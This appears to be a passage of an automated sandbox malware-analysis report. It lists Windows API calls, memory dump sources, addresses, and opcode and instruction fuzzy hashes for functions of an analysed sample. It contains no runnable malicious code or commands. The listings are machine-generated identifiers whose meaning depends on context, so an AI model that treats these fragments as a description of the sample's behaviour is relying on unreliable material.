                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                              • Instruction ID: 7382ef1b91c1852ed503088fc8d08e427c3d74ca490a947f613a04ebbdf6d5aa
                              • Opcode Fuzzy Hash: 96b75ddca664ff2450f6ba1b20c767ec2cb7fe7d0f804c6fbc7d71987d73cc2c
                              • Instruction Fuzzy Hash: D6F096329086109BD763BB785807BDD33A4AF0071CF254109F744EEDD2DF645940DB55
                              APIs
                              • lstrlen.KERNEL32(------,00395BEB), ref: 003B731B
                              • lstrcpy.KERNEL32(00000000), ref: 003B733F
                              • lstrcat.KERNEL32(?,------), ref: 003B7349
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              • API String ID: 3050337572-882505780
                              • Opcode ID: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                              • Instruction ID: 9488289cdac4ba77054366cbce53cc747427437eb2843772c1b7ca0718d8041f
                              • Opcode Fuzzy Hash: ffbfe33b99542bcd5adce4a2fb5282e4cd167f21bbc8f942a9d8e689f8494d43
                              • Instruction Fuzzy Hash: 3DF0C978911B029FDB259F35D84C927BAF9EFD4B05319882DA89AC7614EB30D840DB50
                              APIs
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3422
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A344B
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3471
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3497
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                              • Instruction ID: 2fc8fbddb68cb4b5a532f3d992dc062a9ae1bf357d0b2dd7cb313882a3584607
                              • Opcode Fuzzy Hash: 286358cd93655a3e10d40df424f551a5e2b407f7edc9be95700345855a922953
                              • Instruction Fuzzy Hash: 1612DC70A016019FDB1ACF19C558B25B7E5EF46718B2EC0ADE809DB3A2D776DD42CB80
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7C94
                              • std::_Xinvalid_argument.LIBCPMT ref: 003A7CAF
                                • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D58
                                • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D76
                                • Part of subcall function 003A7D40: std::_Xinvalid_argument.LIBCPMT ref: 003A7D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              • API String ID: 909987262-2556327735
                              • Opcode ID: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                              • Instruction ID: c772498fde6478d29b8ae55ce032d06b285169578a41a920402e4112afdb373f
                              • Opcode Fuzzy Hash: 118cadb98ec080921e30d384bc3f09887b3f0638eb5d1e819c483f8e9f6b2714
                              • Instruction Fuzzy Hash: 5D31C7723086149BD736DE6CECC0A6AF7E9EF92770B214A2AF542CB641D7719C4183E4
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00396F74
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00396F7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              • API String ID: 1357844191-2766056989
                              • Opcode ID: e4b461a6e1ef86baab11efef2e221eece2f392f4371777f7a70b94cde28c7596
                              • Instruction ID: 0387b8c76cdff3435b16bf5e39f54b16c41d89f025a6257ba0e6676ccbdf35d8
                              • Opcode Fuzzy Hash: e4b461a6e1ef86baab11efef2e221eece2f392f4371777f7a70b94cde28c7596
                              • Instruction Fuzzy Hash: 1D218CB16016019BEF218B20DC86BB673E8EB51704F444868F946CBA84FB79E949C750
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B244C
                              • lstrlen.KERNEL32(00000000), ref: 003B24E9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B2570
                              • lstrlen.KERNEL32(00000000), ref: 003B2577
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 9e4dd264b80a248e1647b8afd12f751f28de610151af231e745d7767e6173b2c
                              • Instruction ID: 6205cbe8e8b2b1da1d8aef5ede10ac8065a07ec2742bfb8eb7bfe1bb698a4f64
                              • Opcode Fuzzy Hash: 9e4dd264b80a248e1647b8afd12f751f28de610151af231e745d7767e6173b2c
                              • Instruction Fuzzy Hash: 2181F570E002099BDB25CF95DC44BEFB7B5EF84308F188269E608A7281EB759D46CB94
                              APIs
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000), ref: 0039162D
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391671
                                • Part of subcall function 00391610: lstrcpy.KERNEL32(00000000,?), ref: 00391693
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391557
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391579
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                              • lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                              • Instruction ID: 01904ea307e1dde8fd86eaecd23b2c0cd12ae68310c2121a6aa96c626e79f25a
                              • Opcode Fuzzy Hash: 73a5790af25f027d40e0401157aa622a4cea4b3bb278c04448db72c3d05fadec
                              • Instruction Fuzzy Hash: CD31B475A11F02AFDB25DF3AC588956BBE5BF89305705492DA896D7B10DB30F811CB80
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 003B15A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B15D9
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1611
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1649
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                              • Instruction ID: 0cce8629334bd8ebbe2245fe6109126a56c4822a0a518d3d11f61dcdc6cc7483
                              • Opcode Fuzzy Hash: a886ff0499b175e5f8312ee9ce9a1e2aade1194c56eb71630a9d18168f8a7555
                              • Instruction Fuzzy Hash: 41210874611B029FDB36DF2AD868A17B7F4BF44704B444A1DA886C7A40DB30E811CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 0039162D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039164F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391671
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391693
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                              • Instruction ID: fdb6a51a1d243eaf8c7cda645cf9610788089fc3f1524fcfc3857a31251a369e
                              • Opcode Fuzzy Hash: 2f0e1f7bbf5a16b3085ab9a2ceb63b5698ab9c9fe71fe9a5558e879f9d0777b6
                              • Instruction Fuzzy Hash: 43111C74E12B03ABDF259F36D40D927B7F8BF44301709052DA896D7A40EB30E811CB90